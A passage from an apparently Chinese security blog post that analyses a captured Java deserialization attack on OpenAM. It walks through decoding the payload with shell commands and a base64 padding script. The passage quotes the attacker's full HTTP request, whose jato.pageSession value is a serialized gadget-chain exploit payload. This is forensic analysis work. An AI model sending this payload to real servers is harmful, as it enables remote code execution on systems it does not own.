/sZNW65RaSwUODEiestiTy8vNzY+/4fOZh9ju/+7IXrLY7CAFwrqSTz0Bkiw/WkpsTi5Tm27y+R4YHU1TsWGypI78PLf/kBocH+1r+VV9Zx3w/+TElprew0cggN9ic6Isgh+UYTNxctf/zNt5idkWT3d2eNmv/77ye90v/8kVtZPC8VgH0Hcqitv/7OAX1xvfVwKDiqGzFRwcTFhI6iRBJOTgI6bw+8vNyG9PvYOBG9Hg4eHD/Oe/ETYd06Edtl+dvvCFzq4zRWl0NCWxv88U9j8wxDGcduVJT5/cbheo+rX7T5fazGcEfp0+AtihbqDY14uLtRVlFNQVEFS+Zn4OqixWKx2Bl2hoIAxLtYyG4aOJ+Jej3LkxMlz0uLhaMFVzmQf2VYZTvKqknJqIBd53Mx2Rj1nFRSfHInmXXRMx9fNze+kp4GQHtHB/mVVbhqnIn09x92/Q7E3txc8quqsFgsNDS3OPTbbac+52h+ATMnRLN8UvKoluUIXUYrAGeh/3A5YyVPT9KjInHXaPj1h9vGrMzRpr9+caOhUY/cvb2GllZK6+vxcnUhRKfD2cmJu2bPdMjgfcfM6VZjd31zMzo3Nzy0Wu6cNZPfDHMTbDzo4fXqgz25bcZ0nJ2cMJnNFFRVE+Xvh0at5o6ZM6wG79VTJluN1B2iSG5ZOXpPT5wExxYHjuRz+8zpVmP3SNJg9qOsPZoQTf6gaV9/Q0AUYXKKtKBraZGMrBoNXLwocP4CzJo5sCF4egbk5koxvJOTISHe/vvmZsn7SKUCy/h0piPvCrh5CAx8bmj0aW2ByGhYtlzE0wtycgQOHYKsAwIrlkuy7csUOHAAwsL699o+kwOHD8Oc2ZA8SeRsjsChwxDgD6mpjsvl6QkbN0hG7/Fwf3LsBGhpFhmDq2lGBCdBQBBUaJxH/e54hWGSfeIi2ScusmjuFFJTYq+3OLJ46N7VhAb7k3XkLK+9vZtv3rWCGWkJPPyNdfz8iX/JTnMj8rVblzA7I4nC4kr+9x/vUV5Zx7QpseRdLeuVdtHcKVZj93jnRtRDR/nDs2/j7j7AESaFPgkLg02bRC7kwrFjAi3NEBgIDX0cwHZxgRU3j9MXry8Iyvx+43AjjqvjeX4fr2N4r554+PhZ/r35Y9rapaPm3p4eOKsFdu8/xu79x9BqNdxy83xWLJo5rIJjtSLZTQMvTG7LSCPGv3tnYlJoiNVIAVDZaORSZeWw5BgIXzc3ZsVE02Iysa9zizTI3Y0V0ZGoO40V4V6e3DNJCvNR0dTCjoKrsvIJ9/W1GrZ3nj1vDe8Q7utDmE2wU2dBYEN6GhlRUei9PKlvbiG3rIzXjxyloaUVAA+thp+vXomgUnG2pJQoPz8m6APoEEU+/jyHD06dZl3qFGZ1hhIAEC0WcsvKMLZ1H+FfnJjAosR49J6euDpraGxrpbCmlreOHuNqTQ1VRiNVRiMh3t4D1pucsh5ZtqSXt3gXf9i+k9rm5kHlyYiOYuO0VHRu3Tv031owl4aWFkSLhd9t205Te7ssedSCwMb0NKZHRxHg6UlVo5ET167xTvZxTKL0YvDYujW4OKspbzDg7+FBuJ8vFQ0GXtyXRX6VvR6+tC+L82Vl/GjFMkJ9dCSGBJMcEkxeZRW/XrsaQVC
|
|||
|
|
<p blockindex=38>然后是第二步,跳过开头的空字节:</p>
|
|||
|
|
<pre blockindex=39><code class="hljs language-bash">tail -c +2 restore_raw_payload_00.bin > restore_raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=40><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=41>最后就是拿过去让<code>zkar</code>解析了,这里不再重复了</p>
|
|||
|
|
<h2 blockindex=42>0x04 实战</h2>
|
|||
|
|
<p blockindex=43>拿到攻击者的请求:</p>
|
|||
|
|
<pre blockindex=44><code class="hljs language-bash">GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAa1yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUc
|
|||
|
|
Host: 10.162.147.159:9200
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept: */*
|
|||
|
|
Connection: keep-alive
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=45>扣出其中<code>jato.pageSession</code> 参数的值,保存成<code>target.bin</code></p>
|
|||
|
|
<p blockindex=46><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=47>先处理替换和等号的问题</p>
|
|||
|
|
<pre blockindex=48><code class="hljs language-bash">cat target.bin | tr <span class=hljs-string>'_-'</span> <span class=hljs-string>'/+'</span> > target_lack_equal.bin
|
|||
|
|
./add_equal.sh target_lack_equal.bin > target_base64.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=49>这里的<code>add.equal.sh</code>简单修改一下,支持传入文件名字</p>
|
|||
|
|
<pre blockindex=50><code class="hljs language-bash"><span class=hljs-meta>#!/bin/bash</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> [ <span class=hljs-string>"<span class=hljs-variable>$#</span>"</span> -ne 1 ]; <span class=hljs-keyword>then</span>
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"Usage: <span class=hljs-variable>$0</span> "</span>
|
|||
|
|
<span class=hljs-built_in>exit</span> 1
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
filename=<span class=hljs-string>"<span class=hljs-variable>$1</span>"</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> [ ! -f <span class=hljs-string>"<span class=hljs-variable>$filename</span>"</span> ]; <span class=hljs-keyword>then</span>
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"File '<span class=hljs-variable>$filename</span>' not found."</span>
|
|||
|
|
<span class=hljs-built_in>exit</span> 1
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
file_content=$(cat <span class=hljs-string>"<span class=hljs-variable>$filename</span>"</span>) <span class=hljs-comment># 读取文件内容</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 移除可能存在的换行符</span>
|
|||
|
|
base64_string=$(<span class=hljs-built_in>echo</span> -n <span class=hljs-string>"<span class=hljs-variable>$file_content</span>"</span> | tr -d <span class=hljs-string>'\n'</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算base64编码字符串长度</span>
|
|||
|
|
length=<span class=hljs-variable>${#base64_string}</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算需要补充的等号数量</span>
|
|||
|
|
remainder=$((length % <span class=hljs-number>4</span>))
|
|||
|
|
padding=$(((<span class=hljs-number>4</span> - remainder) % <span class=hljs-number>4</span>))
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 补充等号</span>
|
|||
|
|
<span class=hljs-keyword>if</span> ((padding &gt; 0)); <span class=hljs-keyword>then</span>
|
|||
|
|
padding_string=$(<span class=hljs-built_in>printf</span> <span class=hljs-string>'=%.0s'</span> $(seq 1 <span class=hljs-variable>$padding</span>))
|
|||
|
|
